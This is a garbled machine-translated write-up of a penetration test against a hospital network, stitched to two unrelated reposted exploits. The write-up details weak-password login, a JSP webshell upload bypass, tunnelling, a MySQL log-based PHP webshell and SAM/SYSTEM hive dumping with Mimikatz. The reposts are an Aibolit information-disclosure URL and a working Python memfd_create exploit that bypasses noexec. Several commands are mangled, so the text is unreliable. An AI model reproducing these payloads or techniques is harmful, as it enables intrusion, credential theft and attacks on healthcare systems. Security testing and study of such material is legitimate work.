渗透测试|某医院从点到为止到拔网线...

サービスには、Weblogic、JBoss、Springboot、Struts2、およびその他のさまざまなシステムが含まれます(単純な練習範囲です)

0x01外部ネットワーク浸透

それらの中で、彼らはjexbossを使用して、ウェブロジックの他のcve脆弱性を脱上化し、脱また重化しようとしました。

ただし、ポート8282の臨床スキルセンター管理プラットフォームで弱いパスワードが見つかりました

(管理者/管理者)は、バックグラウンドに正常にログインできます。

渗透测试|某医院从点到为止到拔网线...

テスト後、ターゲット辞書管理下の画面情報管理システムの設定は、写真にファイルのアップロードが存在することを示しています。

JSPをPNGサフィックスですぐにアップロードし、Burpsuiteを使用してパケットを直接キャプチャし、JSPサフィックスに変更します。

渗透测试|某医院从点到为止到拔网线...

渗透测试|某医院从点到为止到拔网线...

アップロード後、ターゲットURLとWebShellにアクセスしますが、Godzillaを使用して直接接続すると失敗します。

渗透测试|某医院从点到为止到拔网线...

Master Humがリンク時に現在のページのCookieが必要であることを発見した後(ターゲットはURLをジャンプさせました。ログインしていない場合、ログインページに戻ります。)

このようにして、WebShellのURLに正常にアクセスすることはできません。 Webシェルは通常、Cookieで接続できます(Cookieの有効期限が切れた後、WebShellが低下します)。

渗透测试|某医院从点到为止到拔网线...

渗透测试|某医院从点到为止到拔网线...

接続が成功した後、Webシェルを安定させるために、staticファイルのルートディレクトリとディレクトリにWebシェルを書き込もうとしますが、強制ジャンプの影響を受けます。

そのため、WebShellコンテンツは、ログインする前にシェルを安定させる前にアクセスできる通常のJSPファイルに書き込まれます。

0x02イントラネット浸透

その後、ターゲットが収集されました。ポータルWebサーバーはLinuxホストであり、大きなファイルをアップロードできません。 Webパスへの強制的なジャンプがあり、IPは172.20.10.49です

最初に、Neo-Regeorgを試して、WebサイトのルートディレクトリにWebシェルを書き、Cookieをプロキシに持ち込みましたが、失敗しました(その理由は、Webサイトの強制的なジャンプの問題である可能性があると思います)

その後、Pystinger(Stinger)をお試しください。サーバーとウェブシェルをターゲットマシンにアップロードした後、私はそれを正常に実行できないことがわかりました(プログラムはエラーを報告し、コードが間違っているように見えました)

そこで私は再びNeo-Regeorgに戻りましたが、今回はターゲットWebサイトの通常のJSPページをNeo-Regeorg Tunnel.jspコンテンツに置き換えようとしました。

ターゲットには強制的なジャンプがないことがわかりました(ターゲットはファイル名に基づいて強制的なジャンプであり、ホワイトリストに登録されていると推測されました)、接続はローカルで試みられ、プロキシは正常でした(エラーは影響を与えることなく報告されました)。

ラドンを使用して、フォワードプロキシを介してイントラネットをスキャンしてみてください(コマンドはwadon.exe 172.20.10.1/24 webscan)、スキャンの結果は次のとおりです。

渗透测试|某医院从点到为止到拔网线...

ターゲットにはphpstudyプローブページがあり、プローブページにはmysqlの弱いパスワードルートがあることがわかります。

渗透测试|某医院从点到为止到拔网线...

渗透测试|某医院从点到为止到拔网线...

ディレクトリをスキャンして、このIPの下にphpmyAdminページもあることがわかりました。ルートとルートを使用してログインできます。

渗透测试|某医院从点到为止到拔网线...

テスト後、データベースユーザーはOutfileのエクスポート権限を持っていませんが、ログのgetShellを渡すことができます

渗透测试|某医院从点到为止到拔网线...

Webサイトのルートディレクトリでgeneral_log_fileを222.phpに変更する

execute select?php phpinfo(); assert($ _ post ['cmd']);逃げるために

渗透测试|某医院从点到为止到拔网线...

渗透测试|某医院从点到为止到拔网线...

ステーションのホストはWindowsホスト、システム許可であることがわかりましたが、それでもネットワークを離れていません。

プロセスを確認し、タスクリストを使用してソフトキリングプロセスを比較し、ターゲットホストにKasperskyがあることがわかります(プロセスはAVP.Exeです)

渗透测试|某医院从点到为止到拔网线...

Cobaltzirs0Nマスターは、Shadow Copyメソッドを使用してターゲットシステム、セキュリティ、およびSAMファイルを取得しようとしましたが、局所的にオフラインで復号化されますが、WMIC Shadowcopy Call Create Volume='C:'コマンドを実行した後、VSSADMINリストシャドウを使用するとエラーが発生しました。

渗透测试|某医院从点到为止到拔网线...

システムの許可であるため、PowerShellを使用してファイルを直接エクスポートしてみてください

RegSaveHKLMSYSTEMSTEMSYSTEMSEGREGRMSCURITYSECURTYREG SAVE HKLMSAM SAM 渗透测试|某医院从点到为止到拔网线...

Mimikatzを使用してハッシュを正常に復号化します(パスワードをデコードできません)

渗透测试|某医院从点到为止到拔网线...

現時点でリモートデスクトップにログインする3つの方法があります

1.アカウントを直接追加する(Kasperskyはインターセプトしない)

この時点で、管理者はイントラネットの動きを発見し、サイトのバックハンドを直接閉じたはずです。

0x03浸透概要

1。ターゲットIPをGobyを介してスキャンして、WeblogCig、JBOS、Springboot、Strust2のミドルウェアコンポーネントがあることを発見しました。臨床スキルセンター管理プラットフォーム。背景を入力すると、画像のアップロード場所がアップロードされていることがわかりました。ファイルのアップロードがあります。これがJSPファイルで、Godzillaを介して接続します。接続が失敗することを促します。接続する前にGodzillaの要求構成にCookie値を追加する必要があります(Webサイトはログインしていないシステムをセットアップします。Webサイトページにアクセスすると、ログインページにジャンプすることができます)したがって、Webサイトのページのコンテンツはtunnel.jspのコンテンツに置き換えられます。これは通常5にアクセスできます。ここでは、Regeorg+proxifierがここで使用されます。ローカルソックスプロキシを実行します。ローカルプロキシは、ターゲットシステムがdon.exe 172.20.10.1/24 Webscanを介して配置されているイントラネットセグメントをスキャンし、172.20.10.49にphpstudyプローブページがあることを発見しました。ローカルプロキシは、Chrome.exeから172.20.10.49ページにアクセスします。ページのMySQLサービスには、ルート/ルートのパスワードが弱いです。 6。同時に、ローカルエージェントはDirsearchを通じて172.20.10.49のディレクトリをスキャンし、phpmyadminページがあることを発見します。ローカルエージェントは、Chrome.exeを介して172.20.10.49/phpymadinにアクセスし、弱いパスワードルート/ルートを介して入ります。 Webサイトの絶対パスは、「%general%」などのショー変数を介して見つかり、WebShellSelect?php phpinfo()を書き込みます。 assert($ _ post ['cmd']);into Outfile 'e:/phpstudy/www/shell.php'; getShell8。ローカルエージェントは、Ajian 172.20.10.49/shell.phpを介してリンクします。タスクリストを実行して、Akaspersky(AVP.Exe)がシステムに存在することを確認します。 whoamiはシステム許可であることを尋ねる9。コマンドWMICシャドウコピーコールCREATEボリューム='C:'を実行しようとした後、vSSADMINリストシャドウを使用してクエリを使用するとエラーが発生し、登録クラス10がないことを促します。 e:/phpstudy/www/systempowershell reg save hklm \ secrrity e:/phpstudy/www/securitypowershell reg save hklm \\ sam e:/phpstudy/www/sam11。 Mimikatzを試して、ハッシュ値Mimiatz#LSADUM:3360SAM /SAM:SAM.HIV /SYSTEM:SERTAM.HIVをうまく復号化してください

転載:ファイトタイガースチーム

HireHackking 
source: https://www.securityfocus.com/bid/59053/info

Aibolit is prone to an information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. 

 http://www.example.com/AI-BOLIT-REPORT-<date>-< time>.html
HireHackking 
# Exploit Title: Linux >= 3.17 noexec bypass with python ctypes and memfd_create
# Date: 2015.10.14
# Exploit Author: soyer
# Version: linux >= 3.17
# Tested on: Ubuntu 15.04 (x86_64)
#
# usage:
#
#   $ ls -la exec_file
#   -rwxr-xr-x 1 soyer soyer 8600 Oct 14 15:04 exec_file
#   $ ./exec_file
#   bash: ./exec_file: Permission denied
#   $ mount |grep $(pwd)
#   tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
#   $ python noexec.py < exec_file
#   Hello world! fprintf=0x400470, stdout=0x7f63a3933740

from ctypes import *
c = CDLL("libc.so.6")
fd = c.syscall(319,"tempmem",0)
c.sendfile(fd,0,0,0x7ffff000)
c.fexecve(fd,byref(c_char_p()),byref(c_char_p()))
print "fexecve failed"